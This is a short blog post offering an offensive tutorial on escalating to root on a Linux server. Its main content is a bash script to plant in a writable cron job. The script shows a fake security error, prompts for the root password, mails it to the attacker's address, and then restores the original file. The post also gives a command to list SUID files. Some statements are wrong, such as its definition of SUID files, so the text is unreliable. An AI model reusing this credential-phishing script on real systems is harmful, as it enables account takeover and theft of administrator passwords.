Skip to main content

Rooting A Server Without Any Root Kernel Exploits

Rooting A Server Without Any Root Kernel Exploits | Juno_okyo's Blog

1 – Looking for Custom Cron Tab Scripts

Cron Jobs are some Tasks that are set to be Executed at a specific time. If the Root user has created a Custom Script used by Cron, and we can Write on this File, we can send a “Fake” Error Message and the Root user will probably type in his password.

First, check out if there are any Cron Job Tasks:

crontab -l
If you see any Custom Script, we must Check out if we can Write on it.
Let’s say we got a Custom script here: /bin/cronscript
To check if we can Write a File, type:
stat /bin/cronscript
(If you get something like: “-rwxrwxrwx” in the output, you can edit the File!)
Let’s edit the file and send a Fake Error Message.
Make a Copy of the Original Script to /bin/cronscript.bak:
cp /bin/cronscript /bin/cronscript.bak
Edit the /bin/cronscript like this:
echo “An System Error Occured!”
echo “”
echo “Error Code: #131425″
echo “”
echo “Update to get the Latest Patch for this Security Issue.”
read -s -p “[sudo] password for root ” rootpasswd
echo “”
echo “su: Authentication failure”
echo “”
sudo apt-get update && sudo apt-get upgrade
sudo echo “The Password is: $rootpasswd” > .kod
mail -s “Root’s Password” “” < .kod
rm .kod
mv cronscript.bak cronscript
You should just Replace the Underlined with your E-Mail and the Name of the Script!
After you save the File, type: chmod +x cronscript to set it as Executable!
This script will:
- Send a Fake Error Message
- Request for the Root’s Password
- Send to your E-Mail Address the Password (make sure that there is the “mail” command at the /bin)
- Restore the Original File
When the Script gets Executed, the Root User will Enter his Password and it will be send to you!
It would be better if you had some knowledge on Bash Programming…

2 – Enumerating all SUID Files

An SUID File is any file that any User group has the Priviliges to Access, Read and Write on it.
What does this mean for you: You can Escalate Priviliges in this way, if it is in an Important Directory.
As before, you can Social-Engineer a Privileged User.
To find all SUID Files, type:
find / -user root -perm -4000 -print
This will show all the SUID Files to your Terminal. Take your time and check them as they can help you to escalate Priviliges!.

Have fun!